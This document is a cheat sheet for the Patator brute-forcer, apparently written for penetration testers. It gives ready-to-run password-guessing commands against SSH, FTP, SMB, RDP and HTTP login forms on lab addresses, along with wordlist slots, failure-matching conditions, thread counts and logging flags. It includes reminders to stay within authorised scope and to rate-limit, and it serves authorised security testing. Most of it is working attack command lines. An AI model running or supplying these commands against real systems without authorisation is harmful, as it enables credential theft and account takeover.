Patator Cheat Sheet
Multi-purpose brute-forcer with flexible modules and conditions.
Overview
Patator is a Python framework for scripted login attacks (SSH, FTP, HTTP, SMB, SQL, etc.) with rich condition matching and rate control. It is online and highly configurable. Ethics: only against targets and credentials in scope; unauthorized access attempts violate law and policy. Use delays and small lists in shared labs.
Install
sudo apt install patatorpatator --helpEssential commands
patator ssh_login host=10.10.10.5 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed'patator ftp_login host=10.10.10.10 user=FILE0 password=FILE1 0=users.txt 1=pass.txtpatator http_fuzz url=http://10.10.10.20/login method=POST body='user=admin&pass=FILE0' 0=pass.txt -x ignore:code=200Common workflows
SSH with user list —
patator ssh_login host=10.10.10.5 user=FILE0 password=FILE1 0=users.txt 1=passwords.txt -x ignore:mesg='Permission denied'-t 4SMB —
patator smb_login host=10.10.10.5 user=FILE0 password=FILE1 0=users.txt 1=pass.txt domain=LAB-x ignore:code=0xC000006DHTTP POST (form) —
patator http_fuzz url=http://10.10.10.20/index.php method=POST body='username=admin&password=FILE0' 0=pass.txt follow=1 accept_cookie=1-x ignore:fgrep='Invalid credentials'RDP —
patator rdp_login host=10.10.10.10 user=administrator password=FILE0 0=pass.txtSave hits —
patator ssh_login host=TARGET user=root password=FILE0 0=pass.txt-l /tmp/patator_ssh.logFlags reference
FILE0 | Wordlist slot 0 |
|---|---|
-x ignore: | Skip on condition |
-x quit: | Stop on success |
-t | Threads |
--rate-limit | Delay between tries |
-l | Log file |
host= | Target |
Tips
- Ethics: set --rate-limit and low -t on production-like targets; document start/stop times for the client.
- Read module help: patator ssh_login --help.
- Use fgrep/egrep/code conditions from a manual failed login before automating.
- Patator shines when Hydra/Medusa modules lack options (custom headers, cookies, encodings).